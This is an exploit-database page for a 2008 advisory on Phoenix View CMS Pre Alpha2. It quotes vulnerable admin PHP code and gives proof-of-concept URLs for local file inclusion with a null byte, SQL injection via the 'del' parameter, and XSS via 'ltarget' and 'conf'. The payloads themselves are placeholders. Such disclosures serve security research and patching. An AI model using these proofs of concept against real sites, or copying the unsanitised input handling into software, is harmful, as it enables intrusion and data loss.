header-logo
Suggest Exploit
vendor:
Phoenix View CMS
by:
tw8
8.8
CVSS
HIGH
LFI, SQLI & XSS
89, 79, 79
CWE
Product Name: Phoenix View CMS
Affected Version From: Pre Alpha2
Affected Version To: Pre Alpha2
Patch Exists: NO
Related CWE: N/A
CPE: a:phoenix_view_cms:phoenix_view_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI][SQLI][XSS]

Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using a self-written Template-Engine. The CMS will use a self-written API and it's gonna be easy to write your own plugins and modules. The vulnerability is caused by the lack of proper input validation in the admin/admin_frame.php and admin/module/*.php files, which allows an attacker to inject malicious code into the application. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to execute unintended commands. Additionally, the application should be configured to use the least privilege necessary to perform its function.
Source

Exploit-DB raw data:

#########################################################################################
Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI][SQLI][XSS]
#########################################################################################

Found by         : tw8
Date             : 8.05.2008
Website && Forum : http://rstzone.org && http://rstzone.org/forum/
Bug type         : LFI, SQLI & XSS
#########################################################################################

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Phoenix View CMS
Version       : <= Pre Alpha2
Vendor        : http://sourceforge.net/projects/phoenixviewcms/
Description   :

Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using a
self-written Template-Engine. The CMS will use a self-written API and it's gonna be
easy to write your own plugins and modules.
########################################################################################

Vulnerabilities:
~~~~~~~~~~~~~~~

Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]:

----------------------------------------------------------------------------
[code]

	if(isset($_GET["ltarget"])) {
	$ltarget=$_GET["ltarget"];
	$_SESSION["lastsecaction"]='';
}
......
	if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) {
		printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden.");
	}
	else {
		include SYSTEM_ADMIN_path . $ltarget . ".php";
	}

  
[/code]
----------------------------------------------------------------------------
 
 POC #1:
 
 http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00
 http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS]
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 Vulnerable code #2 admin/module/*.php [SQLI]:

----------------------------------------------------------------------------
[code]

	class db {
	
......
	
	function query($query,$ressave=false) {
		if($ressave) return mysql_query($query);
		else {
			$this->res = mysql_query($query);
			return $this->res;
		}
	}
......
}
......
	
	 if(isset($_GET["del"])) {
	$db->query("DELETE from " . SYSTEM_dbpref . "todo where id='".$_GET["del"]."'");
	echo "<font color='green'>Löschen erfolgreich</font><br />\n";
}

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/
	
  
[/code]
----------------------------------------------------------------------------
 
 POC #2:
 
 http://www.target.com/path/admin/module/vulnerable_file.php?del=[SQLI]
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Vulnerable code #3 admin/module/*.php [XSS]:

----------------------------------------------------------------------------
[code]

	<input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"];else echo $_POST["conf"]; ?>' />

/*Vulnerable files:
gbuch.admin.php
links.admin.php
menue.admin.php
news.admin.php
todo.admin.php
*/
	
  
[/code]
----------------------------------------------------------------------------
 
 POC #3:
 
 http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS]
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Status:
~~~~~~~

Vendor has not been contacted yet.

###########################################################################

Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside, str0ke & all RST Members.

###########################################################################

Contact:
~~~~~~~

     Website: http://rstzone.org
	 Forum: http://rstzone.org/forum
     E-Mail: ym_tw8[at]yahoo[dot]com


################################ [ EOF ] ##################################

# milw0rm.com [2008-05-09]

Navigation

Suggest Exploit

Services By CQR